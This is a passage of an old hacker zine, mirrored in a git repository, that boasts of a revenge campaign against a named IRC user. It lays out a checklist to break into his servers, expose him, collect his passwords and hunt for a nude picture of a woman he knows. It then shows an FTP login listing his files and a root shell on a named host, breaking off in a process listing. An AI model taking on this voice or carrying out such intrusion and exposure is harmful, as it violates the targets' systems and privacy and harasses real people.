Mirrors/Zines
1
0
Fork 0
mirror of https://github.com/fdiskyou/Zines.git synced 2025-03-09 00:00:00 +01:00
Code Issues Releases Wiki Activity
Zines/dikline/rotorownage.txt
fdiskyou 180dfff1cc bring back some more
2017-12-10 21:54:57 +00:00

2199 lines
75 KiB
Text
Raw Blame History

_______ _______ _________ _______ _______
( ____ )( __ )\__ __/( __ )( ____ )
| ( )|| ( ) | ) ( | ( ) || ( )|
| (____)|| | / | | | | | / || (____)|
| __)| (/ /) | | | | (/ /) || __)
| (\ ( | / | | | | | / | || (\ (
| ) \ \__| (__) | | | | (__) || ) \ \__
|/ \__/(_______) )_( (_______)|/ \__/
_______ GOT _ _______ ______
( __ )|\ /|( ( /|( ____ \( __ \
| ( ) || ) ( || \ ( || ( \/| ( \ )
| | / || | _ | || \ | || (__ | | ) |
| (/ /) || |( )| || (\ \) || __) | | | |
| / | || || || || | \ || ( | | ) |
| (__) || () () || ) \ || (____/\| (__/ )
(_______)(_______)|/ )_)(_______/(______/
This little kid has been pissing off way to many people lately.
Time to put this to an end.
###################################################################
[1] r0t0r info
[2] Checklist
[3] Killerz.org gets owned
[4] matts.homeunix.net owned
[5] Logs of r0t0r making an ass out of himself
[6] r0t0r's roots, ciscos and passwords! =)
[7] KC and the sunshine band (Ok that was bad..)
[8] Conclusion
###################################################################
[1] This little kid wages stupid IRC wars and thinks he is leet just
because he can DoS attack.
No skills, no maners and no brain.
Im amazed that nobody has owned this kid before, after all he is
the most pathetic loud mouth little junkie that you can find on IRC.
Well.. maybe not but he is pretty pathetic.
[2] r0t0r Check list
1. Own killerz
2. Own matts.homeunix.net
3. Find more shells and own them
4. Expose rotor as a fake and a drunk
5. Expose r0t0rs lame roots
6. Find his cisco's which he uses to DoS people
7. Get his passwords and see if I can find a naked pic of that girl he
is
messing around with.
I guess thats it for now. Lets get started
[3] He used to own "www.killerz.org" until that got taken over by #obs /
nesa / others(?)
But anyways.. lets log in and see what the dude has shall we? =)
$ ftp killerz.org
Connected to killerz.org (69.50.184.178).
220---------- Welcome to Pure-FTPd [TLS] ----------
220-You are user number 3 of 50 allowed.
220-Local time is now 14:59. Server port: 21.
220-IPv6 connections are also welcome on this server.
220 You will be disconnected after 15 minutes of inactivity.
Name (killerz.org:root): killerz
331 User killerz OK. Password required
Password:
230-User killerz has group access to: killerz
230 OK. Current restricted directory is /
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls *
227 Entering Passive Mode (69,50,184,178,38,41)
150 Accepted data connection
-rw-r--r-- 1 32479 killerz 196079 Jan 13 01:17 FreeBSD.png
-rw-r--r-- 1 32479 killerz 2577 Jan 3 21:06 index.html
-rw-r--r-- 1 32479 killerz 1383 Mar 26 03:43 kscan.c
code:
drwxr-xr-x 2 32479 killerz 4096 Dec 19 19:07 .
drwx--x--x 12 32479 killerz 4096 Apr 6 14:38 ..
-rw-r--r-- 1 32479 killerz 507 Dec 19 19:07 coolPHP.txt
etc:
drwxr-x--- 3 32479 12 4096 Dec 17 13:09 .
drwx--x--x 12 32479 killerz 4096 Apr 6 14:38 ..
-rw-r--r-- 1 32479 killerz 0 Dec 17 13:00 .imapv4cp5c
-rw-r--r-- 1 32479 killerz 0 Dec 17 13:09 ftpquota
drwxr-x--- 2 32479 12 4096 Mar 28 01:29 killerz.org
mail:
drwxrwx--- 3 32479 12 4096 Apr 6 07:57 .
drwx--x--x 12 32479 killerz 4096 Apr 6 14:38 ..
-rw-rw---- 1 32479 12 508 Jan 9 18:54 INBOX.Drafts
-rw-rw---- 1 32479 12 1351 Jan 9 21:14 INBOX.Sent
-rw-rw---- 1 32479 12 714071 Jan 9 18:58 INBOX.Trash
-rw-rw---- 1 32479 12 7203732 Apr 6 07:57 inbox
drwxr-xr-x 3 32479 12 4096 Dec 17 04:19 killerz.org
-rw-rw---- 1 32479 12 210853 Jan 9 18:53 neomail-trash
-rw-rw---- 1 32479 12 0 Dec 19 22:38 saved-messages
-rw-rw---- 1 32479 12 426549 Jan 9 18:54 sent-mail
public_ftp:
drwxr-xr-x 3 32479 killerz 4096 Dec 15 14:52 .
drwx--x--x 12 32479 killerz 4096 Apr 6 14:38 ..
drwxr-xr-x 2 32479 killerz 4096 Dec 15 14:52 incoming
public_html:
drwxr-x--- 30 32479 99 4096 Apr 6 14:45 .
drwx--x--x 12 32479 killerz 4096 Apr 6 14:38 ..
-rw-r--r-- 1 32479 killerz 356 Dec 15 14:53 .htaccess
-rw-r--r-- 1 32479 killerz 332394 Mar 20 20:33 0x41.tgz
drwxr-xr-x 2 32479 killerz 4096 Jan 13 01:14 FreeBSD
-rw-r--r-- 1 32479 killerz 30720 Jan 28 12:29 FreeBSD.png
-rw-r--r-- 1 32479 killerz 458 Dec 31 03:33 LOL.html
-rw-r--r-- 1 32479 killerz 147448 Mar 28 04:58 Scan0007.jpg
-rw-r--r-- 1 32479 killerz 10240 Dec 17 13:14 Thumbs.db
drwxr-xr-x 2 32479 killerz 4096 Dec 15 14:53 _private
drwxr-xr-x 4 32479 killerz 4096 Dec 15 14:53 _vti_bin
drwxr-xr-x 2 32479 killerz 4096 Dec 15 14:53 _vti_cnf
-rw-r--r-- 1 32479 killerz 1754 Dec 15 14:53 _vti_inf.html
drwxr-xr-x 2 32479 killerz 4096 Dec 15 14:53 _vti_log
drwxr-x--- 2 32479 99 4096 Mar 28 01:16 _vti_pvt
drwxr-xr-x 2 32479 killerz 4096 Dec 15 14:53 _vti_txt
drwxrwxrwx 5 32479 killerz 4096 Dec 31 01:36 abicons
-rw-r--r-- 1 32479 killerz 373 Dec 30 22:49 b4b0.php
-rw-r--r-- 1 32479 killerz 5307 Mar 31 14:21 c0n3ct.c
drwxr-xr-x 2 32479 killerz 4096 Dec 26 21:35 cam2
drwxr-xr-x 3 32479 killerz 4096 Dec 31 01:35 cgi-bin
drwxr-xr-x 2 32479 killerz 4096 Jan 9 22:39 code
drwxr-xr-x 5 32479 killerz 4096 Dec 25 15:16 cutenews
drwxr-xr-x 2 32479 killerz 4096 Dec 26 20:51 ebay
drwxr-xr-x 4 32479 killerz 4096 Dec 22 18:35 electronics
drwxr-xr-x 3 32479 killerz 4096 Mar 19 00:37 fileupload
drwxr-xr-x 2 32479 killerz 4096 Apr 4 21:43 fuck
-rw-r--r-- 1 32479 killerz 5298 Mar 21 17:45 hawe
drwxr-xr-x 2 32479 killerz 4096 Dec 24 04:09 images
-rw-r--r-- 1 32479 killerz 2568 Mar 19 01:22 index.php
drwxr-xr-x 2 32479 killerz 4096 Dec 17 13:13 index_files
drwxr-xr-x 3 32479 killerz 4096 Dec 19 19:51 irc
-rw-r--r-- 1 32479 killerz 921 Jan 4 03:58 kdoor.txt
-rw-r--r-- 1 32479 killerz 1776 Mar 24 05:16 klog.txt
-rw-r--r-- 1 32479 killerz 1994 Apr 5 02:31 kscan.c
drwxr-xr-x 2 32479 killerz 4096 Dec 17 14:49 music
-rw-r--r-- 1 32479 killerz 1390 Mar 20 02:56 netit
-rw-r--r-- 1 32479 killerz 5123 Mar 20 03:01 netstat.txt
drwxr-xr-x 4 32479 killerz 4096 Dec 24 03:20 newlay
-rw-r--r-- 1 32479 killerz 133435 Mar 22 02:55 newss.GIF
drwxr-xr-x 2 32479 killerz 4096 Dec 22 18:32 papers
drwxr-xr-x 4 32479 killerz 4096 Mar 18 23:46 pastebin
-rwxr-xr-x 1 32479 killerz 6625 Mar 18 23:47 pastebin.pl
drwxr-xr-x 10 32479 killerz 4096 Dec 17 13:01 phpBB
drwxr-xr-x 5 32479 killerz 4096 Jan 17 17:52 pics
-rw-r--r-- 1 32479 killerz 2448 Dec 15 14:53 postinfo.html
drwxr-xr-x 2 32479 killerz 4096 Mar 26 19:49 r00t
drwxr-xr-x 3 32479 killerz 4096 Mar 17 23:50 scamz
-rw-r--r-- 1 32479 killerz 2777 Mar 25 02:54 shelld.c
-rw-r--r-- 1 32479 killerz 1123 Mar 23 23:58 tsniff.txt
drwxr-xr-x 5 32479 killerz 4096 Mar 28 22:40 ~techg0d
tmp:
drwx------ 6 32479 killerz 4096 Dec 29 11:10 .
drwx--x--x 12 32479 killerz 4096 Apr 6 14:38 ..
drwx------ 4 32479 killerz 4096 Apr 3 18:28 analog
drwx------ 2 32479 killerz 4096 Apr 3 18:28 awstats
-rw-r--r-- 1 32479 killerz 0 Apr 3 18:28 lastrun
-rw-r--r-- 1 32479 killerz 0 Apr 4 06:48 lastrun.bw
drwx------ 4 32479 killerz 4096 Apr 1 17:07 webalizer
drwx------ 2 32479 killerz 4096 Mar 18 02:04 webalizerftp
www:
drwxr-x--- 30 32479 99 4096 Apr 6 14:45 .
drwx--x--x 12 32479 killerz 4096 Apr 6 14:38 ..
-rw-r--r-- 1 32479 killerz 356 Dec 15 14:53 .htaccess
-rw-r--r-- 1 32479 killerz 332394 Mar 20 20:33 0x41.tgz
drwxr-xr-x 2 32479 killerz 4096 Jan 13 01:14 FreeBSD
-rw-r--r-- 1 32479 killerz 30720 Jan 28 12:29 FreeBSD.png
-rw-r--r-- 1 32479 killerz 458 Dec 31 03:33 LOL.html
-rw-r--r-- 1 32479 killerz 147448 Mar 28 04:58 Scan0007.jpg
-rw-r--r-- 1 32479 killerz 10240 Dec 17 13:14 Thumbs.db
drwxr-xr-x 2 32479 killerz 4096 Dec 15 14:53 _private
drwxr-xr-x 4 32479 killerz 4096 Dec 15 14:53 _vti_bin
drwxr-xr-x 2 32479 killerz 4096 Dec 15 14:53 _vti_cnf
-rw-r--r-- 1 32479 killerz 1754 Dec 15 14:53 _vti_inf.html
drwxr-xr-x 2 32479 killerz 4096 Dec 15 14:53 _vti_log
drwxr-x--- 2 32479 99 4096 Mar 28 01:16 _vti_pvt
drwxr-xr-x 2 32479 killerz 4096 Dec 15 14:53 _vti_txt
drwxrwxrwx 5 32479 killerz 4096 Dec 31 01:36 abicons
-rw-r--r-- 1 32479 killerz 373 Dec 30 22:49 b4b0.php
-rw-r--r-- 1 32479 killerz 5307 Mar 31 14:21 c0n3ct.c
drwxr-xr-x 2 32479 killerz 4096 Dec 26 21:35 cam2
drwxr-xr-x 3 32479 killerz 4096 Dec 31 01:35 cgi-bin
drwxr-xr-x 2 32479 killerz 4096 Jan 9 22:39 code
drwxr-xr-x 5 32479 killerz 4096 Dec 25 15:16 cutenews
drwxr-xr-x 2 32479 killerz 4096 Dec 26 20:51 ebay
drwxr-xr-x 4 32479 killerz 4096 Dec 22 18:35 electronics
drwxr-xr-x 3 32479 killerz 4096 Mar 19 00:37 fileupload
drwxr-xr-x 2 32479 killerz 4096 Apr 4 21:43 fuck
-rw-r--r-- 1 32479 killerz 5298 Mar 21 17:45 hawe
drwxr-xr-x 2 32479 killerz 4096 Dec 24 04:09 images
-rw-r--r-- 1 32479 killerz 2568 Mar 19 01:22 index.php
drwxr-xr-x 2 32479 killerz 4096 Dec 17 13:13 index_files
drwxr-xr-x 3 32479 killerz 4096 Dec 19 19:51 irc
-rw-r--r-- 1 32479 killerz 921 Jan 4 03:58 kdoor.txt
-rw-r--r-- 1 32479 killerz 1776 Mar 24 05:16 klog.txt
-rw-r--r-- 1 32479 killerz 1994 Apr 5 02:31 kscan.c
drwxr-xr-x 2 32479 killerz 4096 Dec 17 14:49 music
-rw-r--r-- 1 32479 killerz 1390 Mar 20 02:56 netit
-rw-r--r-- 1 32479 killerz 5123 Mar 20 03:01 netstat.txt
drwxr-xr-x 4 32479 killerz 4096 Dec 24 03:20 newlay
-rw-r--r-- 1 32479 killerz 133435 Mar 22 02:55 newss.GIF
drwxr-xr-x 2 32479 killerz 4096 Dec 22 18:32 papers
drwxr-xr-x 4 32479 killerz 4096 Mar 18 23:46 pastebin
-rwxr-xr-x 1 32479 killerz 6625 Mar 18 23:47 pastebin.pl
drwxr-xr-x 10 32479 killerz 4096 Dec 17 13:01 phpBB
drwxr-xr-x 5 32479 killerz 4096 Jan 17 17:52 pics
-rw-r--r-- 1 32479 killerz 2448 Dec 15 14:53 postinfo.html
drwxr-xr-x 2 32479 killerz 4096 Mar 26 19:49 r00t
drwxr-xr-x 3 32479 killerz 4096 Mar 17 23:50 scamz
-rw-r--r-- 1 32479 killerz 2777 Mar 25 02:54 shelld.c
-rw-r--r-- 1 32479 killerz 1123 Mar 23 23:58 tsniff.txt
drwxr-xr-x 5 32479 killerz 4096 Mar 28 22:40 ~techg0d
## Well.. ftp access is good and all... but I want more
root@panther [/root]# uname -a; id
Linux panther.unixbsd.info 2.6.10-grsec #2 Sun Jan 9 16:59:21 PST 2005 i686
i686 i386 GNU/Linux
uid=0(root) gid=0(root) groups=XXXX(XXXXXXXXX) ## There we go! :)
root@panther [/tmp]# ps aux
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.0 1540 500 ? S Apr04 0:06 init [3]
root 2 0.0 0.0 0 0 ? SWN Apr04 0:02 [ksoftirqd/0]
root 3 0.0 0.0 0 0 ? SW< Apr04 0:00 [events/0]
root 4 0.0 0.0 0 0 ? SW< Apr04 0:00 [khelper]
root 22 0.0 0.0 0 0 ? SW< Apr04 0:13 [kblockd/0]
root 52 0.0 0.0 0 0 ? SW Apr04 0:00 [kapmd]
root 72 0.0 0.0 0 0 ? SW Apr04 0:00 [pdflush]
root 75 0.0 0.0 0 0 ? SW< Apr04 0:00 [aio/0]
root 74 0.0 0.0 0 0 ? SW Apr04 0:54 [kswapd0]
root 662 0.0 0.0 0 0 ? SW Apr04 0:00 [kseriod]
root 767 0.0 0.0 0 0 ? SW Apr04 2:44 [kjournald]
root 1565 0.0 0.0 0 0 ? SW Apr04 0:00 [kjournald]
root 1911 0.0 0.0 0 0 ? SW Apr04 0:00 [khpsbpkt]
root 2633 0.0 0.0 1596 572 ? S Apr04 0:52 syslogd -m 0
root 2637 0.0 0.0 1548 496 ? S Apr04 0:01 klogd -x
root 2736 0.0 0.1 10516 2008 ? S Apr04 0:01
/usr/sbin/snmpd -s -l /dev/null -P /var/run/snmpd -a
root 4221 0.0 0.1 8520 1380 ? S Apr04 0:00 cupsd
root 4514 0.0 0.1 3668 1376 ? SN Apr04 0:11
/usr/sbin/sshd
root 4559 0.0 0.0 2152 796 ? S Apr04 0:01 xinetd
-stayalive -pidfile /var/run/xinetd.pid
postgres 4600 0.0 0.1 10960 1708 ? S Apr04 0:00
/usr/bin/postmaster -p 5432 -D /var/lib/pgsql/data
postgres 4601 0.0 0.1 10244 1472 ? S Apr04 0:00 postgres:
stats buffer process
postgres 4602 0.0 0.1 9252 1512 ? S Apr04 0:00 postgres:
stats collector process
root 4605 0.0 0.1 7024 1644 ? SN Apr04 0:07 sshd:
root@pts/0
root 4626 0.0 0.1 7192 1936 ? S Apr04 0:06 chkservd
root 4690 0.0 0.1 5336 1284 pts/0 S Apr04 0:00 -bash
root 4724 0.2 0.7 43220 7812 ? S Apr04 13:31
/usr/sbin/clamd
mailnull 4735 0.0 0.1 6636 1752 ? SN Apr04 0:22
/usr/sbin/exim -bd -q60m
mailnull 4740 0.0 0.1 6636 1748 ? SN Apr04 0:00
/usr/sbin/exim -tls-on-connect -bd -oX 465
root 4746 0.0 0.1 2976 1492 ? S Apr04 4:10 antirelayd
root 4754 0.0 1.6 20188 17584 ? SN Apr04 1:53
/usr/local/apache/bin/httpd -DSSL
root 4762 0.0 0.3 11296 3484 ? SN Apr04 1:54 cppop -
accepting on port 110
root 4844 0.0 0.1 6932 1720 ? SN Apr04 0:01 pure-ftpd
(SERVER)
root 4847 0.0 0.0 6672 864 ? S Apr04 0:00
/usr/sbin/pure-authd -s /var/run/ftpd.sock -r /usr/sbin/pureauth
root 4878 0.0 0.0 1612 668 ? S Apr04 0:00 crond
root 4894 0.0 0.0 5328 1028 ? S Apr04 0:00 /bin/sh
/usr/bin/mysqld_safe --datadir=/var/lib/mysql
--pid-file=/var/lib/mysql/panther.unixbsd.info.pid
xfs 4943 0.0 0.0 5100 736 ? S Apr04 0:00 xfs -droppriv
-daemon
mysql 4946 0.0 7.8 93980 81004 ? SN Apr04 0:36
/usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql
--pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking
--socket=/var/lib/mysql/mysql.sock
daemon 4956 0.0 0.0 1592 560 ? S Apr04 0:00 /usr/sbin/atd
mysql 4963 0.0 7.8 93980 81004 ? SN Apr04 0:00
/usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql
--pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking
--socket=/var/lib/mysql/mysql.sock
mysql 4971 0.0 7.8 93980 81004 ? SN Apr04 1:19
/usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql
--pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking
--socket=/var/lib/mysql/mysql.sock
mysql 5132 0.1 7.8 93980 81004 ? SN Apr04 6:30
/usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql
--pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking
--socket=/var/lib/mysql/mysql.sock
mysql 5375 0.0 7.8 93980 81004 ? SN Apr04 5:27
/usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql
--pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking
--socket=/var/lib/mysql/mysql.sock
mailnull 5376 0.0 0.3 5872 3448 ? SN Apr04 0:36 /usr/bin/perl
/usr/local/cpanel/bin/eximstats
mysql 5377 0.1 7.8 93980 81004 ? SN Apr04 6:01
/usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql
--pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking
--socket=/var/lib/mysql/mysql.sock
root 5381 0.0 0.1 9528 1968 ? S Apr04 0:16 cpsrvd -
waiting for connections
mysql 5395 0.0 7.8 93980 81004 ? SN Apr04 5:18
/usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql
--pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking
--socket=/var/lib/mysql/mysql.sock
root 5398 0.3 6.7 77676 69432 ? SN Apr04 21:43 cpanellogd -
setting up logs for vinniej
mysql 5403 0.0 7.8 93980 81004 ? SN Apr04 5:19
/usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql
--pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking
--socket=/var/lib/mysql/mysql.sock
root 5404 0.0 0.1 8172 1624 ? SN Apr04 0:00 cppop -
accepting on port 110
nobody 5408 0.0 0.1 3444 1384 ? S Apr04 0:00 entropychat
nobody 5412 0.0 0.0 1904 884 ? SN Apr04 0:00
/usr/local/cpanel/bin/startmelange
cpanel 5442 0.0 0.1 36836 1888 ? SN Apr04 0:00
/usr/bin/stunnel-4.04local
/usr/local/cpanel/etc/stunnel/default/stunnel.conf
root 5470 0.0 0.0 1600 468 ? SN Apr04 0:00 jsvc.exec
-user tomcat -cp ./bootstrap.jar -Djava.endorsed.dirs=../common/endorsed
org.apache.catalina.startup.Bootstrap -debug -outfile ../logs/catalina.out
-errfile ..
tomcat 5471 0.0 1.3 244916 13680 ? SN Apr04 1:43 jsvc.exec
-user tomcat -cp ./bootstrap.jar -Djava.endorsed.dirs=../common/endorsed
org.apache.catalina.startup.Bootstrap -debug -outfile ../logs/catalina.out
-errfile ..
mailman 5476 0.0 0.2 7348 2100 ? SN Apr04 0:00
/usr/bin/python2 /usr/local/cpanel/3rdparty/mailman/bin/mailmanctl -s start
mailman 5489 0.0 0.2 7176 2164 ? SN Apr04 0:08
/usr/bin/python2 /usr/local/cpanel/3rdparty/mailman/bin/qrunner
--runner=ArchRunner:0:1 -s
mailman 5490 0.0 0.2 7136 2192 ? SN Apr04 0:09
/usr/bin/python2 /usr/local/cpanel/3rdparty/mailman/bin/qrunner
--runner=BounceRunner:0:1 -s
mailman 5491 0.0 0.2 7128 2112 ? SN Apr04 0:08
/usr/bin/python2 /usr/local/cpanel/3rdparty/mailman/bin/qrunner
--runner=CommandRunner:0:1 -s
mailman 5492 0.0 0.2 7220 2164 ? SN Apr04 0:08
/usr/bin/python2 /usr/local/cpanel/3rdparty/mailman/bin/qrunner
--runner=IncomingRunner:0:1 -s
mailman 5493 0.0 0.2 7216 2184 ? SN Apr04 0:08
/usr/bin/python2 /usr/local/cpanel/3rdparty/mailman/bin/qrunner
--runner=NewsRunner:0:1 -s
mailman 5494 0.0 0.3 7320 4084 ? SN Apr04 0:09
/usr/bin/python2 /usr/local/cpanel/3rdparty/mailman/bin/qrunner
--runner=OutgoingRunner:0:1 -s
mailman 5495 0.0 0.4 7176 4308 ? SN Apr04 0:11
/usr/bin/python2 /usr/local/cpanel/3rdparty/mailman/bin/qrunner
--runner=VirginRunner:0:1 -s
mailman 5496 0.0 0.2 7176 2080 ? SN Apr04 0:00
/usr/bin/python2 /usr/local/cpanel/3rdparty/mailman/bin/qrunner
--runner=RetryRunner:0:1 -s
root 5510 0.0 0.0 1700 716 ? S Apr04 0:00
/usr/sbin/portsentry -tcp
root 5531 0.0 0.0 1596 420 ? S Apr04 0:00 mdadm
--monitor --scan -f
root 5557 0.0 0.0 1532 400 tty1 S Apr04 0:00
/sbin/mingetty tty1
root 5558 0.0 0.0 1532 400 tty2 S Apr04 0:00
/sbin/mingetty tty2
root 5559 0.0 0.0 1532 400 tty3 S Apr04 0:00
/sbin/mingetty tty3
root 5560 0.0 0.0 1532 400 tty4 S Apr04 0:00
/sbin/mingetty tty4
root 5561 0.0 0.0 1532 400 tty5 S Apr04 0:00
/sbin/mingetty tty5
root 5562 0.0 0.0 1532 400 tty6 S Apr04 0:00
/sbin/mingetty tty6
named 6917 0.0 0.5 33080 5512 ? S Apr04 0:37
/usr/sbin/named -u named
mysql 14176 0.1 7.8 93980 81004 ? SN Apr04 6:48
/usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql
--pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking
--socket=/var/lib/mysql/mysql.sock
mysql 18195 0.1 7.8 93980 81004 ? SN Apr04 6:28
/usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql
--pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking
--socket=/var/lib/mysql/mysql.sock
mysql 4745 0.0 7.8 93980 81004 ? SN Apr05 4:51
/usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql
--pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking
--socket=/var/lib/mysql/mysql.sock
mysql 15352 0.0 7.8 93980 81004 ? SN Apr05 4:47
/usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql
--pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking
--socket=/var/lib/mysql/mysql.sock
mysql 27221 0.0 7.8 93980 81004 ? SN Apr05 4:44
/usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql
--pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking
--socket=/var/lib/mysql/mysql.sock
mysql 27222 0.0 7.8 93980 81004 ? SN Apr05 5:07
/usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql
--pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking
--socket=/var/lib/mysql/mysql.sock
mysql 27223 0.1 7.8 93980 81004 ? SN Apr05 5:50
/usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql
--pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking
--socket=/var/lib/mysql/mysql.sock
mysql 27224 0.0 7.8 93980 81004 ? SN Apr05 4:46
/usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql
--pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking
--socket=/var/lib/mysql/mysql.sock
mysql 29564 0.0 7.8 93980 81004 ? SN Apr05 5:20
/usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql
--pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking
--socket=/var/lib/mysql/mysql.sock
mysql 31976 0.0 7.8 93980 81004 ? SN Apr05 3:21
/usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql
--pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking
--socket=/var/lib/mysql/mysql.sock
mysql 2723 0.0 7.8 93980 81004 ? SN Apr05 3:13
/usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql
--pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking
--socket=/var/lib/mysql/mysql.sock
root 13889 0.0 0.0 0 0 ? SW Apr06 0:22 [pdflush]
root 32694 0.0 0.2 6880 2128 ? SN Apr06 0:00 sshd:
root@pts/1
root 32711 0.0 0.1 5332 1344 pts/1 S Apr06 0:00 -bash
mysql 14337 0.0 7.8 93980 81004 ? SN Apr07 0:51
/usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql
--pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking
--socket=/var/lib/mysql/mysql.sock
mysql 14345 0.0 7.8 93980 81004 ? SN Apr07 0:54
/usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql
--pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking
--socket=/var/lib/mysql/mysql.sock
mysql 14349 0.0 7.8 93980 81004 ? SN Apr07 0:53
/usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql
--pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking
--socket=/var/lib/mysql/mysql.sock
mysql 14362 0.0 7.8 93980 81004 ? SN Apr07 0:52
/usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql
--pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking
--socket=/var/lib/mysql/mysql.sock
mysql 14363 0.0 7.8 93980 81004 ? SN Apr07 0:55
/usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql
--pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking
--socket=/var/lib/mysql/mysql.sock
mysql 14364 0.0 7.8 93980 81004 ? SN Apr07 0:52
/usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql
--pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking
--socket=/var/lib/mysql/mysql.sock
mysql 14365 0.0 7.8 93980 81004 ? SN Apr07 0:50
/usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql
--pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking
--socket=/var/lib/mysql/mysql.sock
mysql 14366 0.0 7.8 93980 81004 ? SN Apr07 0:51
/usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql
--pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking
--socket=/var/lib/mysql/mysql.sock
mysql 14367 0.0 7.8 93980 81004 ? SN Apr07 0:52
/usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql
--pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking
--socket=/var/lib/mysql/mysql.sock
mysql 14388 0.0 7.8 93980 81004 ? SN Apr07 0:50
/usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql
--pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking
--socket=/var/lib/mysql/mysql.sock
mysql 14432 0.0 7.8 93980 81004 ? SN Apr07 0:55
/usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql
--pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking
--socket=/var/lib/mysql/mysql.sock
mysql 14435 0.0 7.8 93980 81004 ? SN Apr07 0:56
/usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql
--pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking
--socket=/var/lib/mysql/mysql.sock
mysql 14436 0.0 7.8 93980 81004 ? SN Apr07 0:52
/usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql
--pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking
--socket=/var/lib/mysql/mysql.sock
mysql 14438 0.0 7.8 93980 81004 ? SN Apr07 0:54
/usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql
--pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking
--socket=/var/lib/mysql/mysql.sock
mysql 14439 0.0 7.8 93980 81004 ? SN Apr07 0:56
/usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql
--pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking
--socket=/var/lib/mysql/mysql.sock
mysql 14440 0.0 7.8 93980 81004 ? SN Apr07 0:53
/usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql
--pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking
--socket=/var/lib/mysql/mysql.sock
root 14473 0.2 0.1 5352 1432 pts/0 S Apr07 5:20 top
root 13105 0.0 0.3 8100 3492 ? SN Apr07 0:00 /usr/bin/perl
/usr/local/cpanel/bin/leechprotect
nobody 13106 0.1 2.2 26460 22936 ? SN Apr07 1:53
/usr/local/apache/bin/httpd -DSSL
nobody 13107 0.1 1.8 21436 19128 ? SN Apr07 2:12
/usr/local/apache/bin/httpd -DSSL
nobody 13108 0.1 1.8 22068 19616 ? SN Apr07 2:00
/usr/local/apache/bin/httpd -DSSL
nobody 13124 0.1 2.6 32388 27596 ? SN Apr07 1:58
/usr/local/apache/bin/httpd -DSSL
nobody 13125 0.1 2.2 27076 23312 ? SN Apr07 1:47
